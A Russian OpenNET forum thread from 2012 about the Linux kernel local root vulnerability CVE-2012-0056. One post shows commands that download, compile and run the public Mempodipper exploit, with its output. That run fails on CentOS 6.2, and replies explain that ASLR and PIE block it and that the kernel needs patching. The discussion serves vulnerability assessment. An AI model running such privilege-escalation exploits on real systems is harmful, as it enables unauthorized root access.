The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

, opennews (?), 23-Янв-12, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


50. "В ядре Linux найдена локальная root-уязвимость"  –5 +/
Сообщение от ALex_hha (ok), 23-Янв-12, 18:28 
$ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
$ gcc -o mempodipper mempodipper.c
$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/19890/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1e70.
[+] Calculating su padding.
[+] Seeking to offset 0x1e62.
[+] Executing su with shellcode.

$ whoami
test

$ id
uid=500(test) gid=501(test) groups=501(test)

ЧЯДНТ?

$ cat /etc/redhat-release
CentOS release 6.2 (Final)

$ uname -r
2.6.32-220.2.1.el6.x86_64

Ответить | Правка | Наверх | Cообщить модератору

62. "В ядре Linux найдена локальная root-уязвимость"  –3 +/
Сообщение от XPEHemail (?), 23-Янв-12, 18:58 
> ЧЯДНТ?

Читать не умеете: во всех ядрах 2.6.39 и выше

Ответить | Правка | Наверх | Cообщить модератору

71. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от solardiz (ok), 23-Янв-12, 19:18 
... и в RHEL 6 начиная с 2.6.32-220.el6, согласно Red Hat'у. Так что CentOS 6 с этой версией ядра должен быть уязвим. Но там могут быть другие отличия, ломающие конкретный эксплойт.
Ответить | Правка | Наверх | Cообщить модератору

65. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от solardiz (ok), 23-Янв-12, 19:05 
Это немного странно, хотя не-работа конкретного эксплойта мало что значит. Если разбираться, я бы начал с проверки наличия mem_write с помощью вот этой тестовой программки: https://bugzilla.redhat.com/attachment.cgi?id=556461
Ответить | Правка | К родителю #50 | Наверх | Cообщить модератору

165. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от solardiz (ok), 24-Янв-12, 15:52 
Как многие уже догадались, на RHEL 6 и некоторых других системах, где опубликованные эксплойты как-бы не работают, дело в ASLR и PIE. Для успешной атаки потребуется другая SUID/SGID-программа (собранная не как PIE, но тоже выводящая что-то подходящее в stdout или stderr) или обход ASLR (много запусков) или выключенный ASLR. Ядро обновлять нужно - и как можно скорее.

http://www.openwall.com/lists/oss-security/2012/01/24/2

"On Red Hat Enterprise Linux 6, /bin/su (coreutils) and /usr/bin/gpasswd (shadow-utils) are protected at compile time by PIE."

https://access.redhat.com/kb/docs/DOC-69129

"2012-01-24: Article updated to reflect the release of the Red Hat Security Advisory RHSA-2012:0052, which fixes the CVE-2012-0056 flaw for Red Hat Enterprise Linux 6. The article was also updated to provide more information about generating a SystemTap kernel module for other computers, and to clarify that the publicly-circulated exploits do not affect Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG at the time of writing."

Ответить | Правка | К родителю #50 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру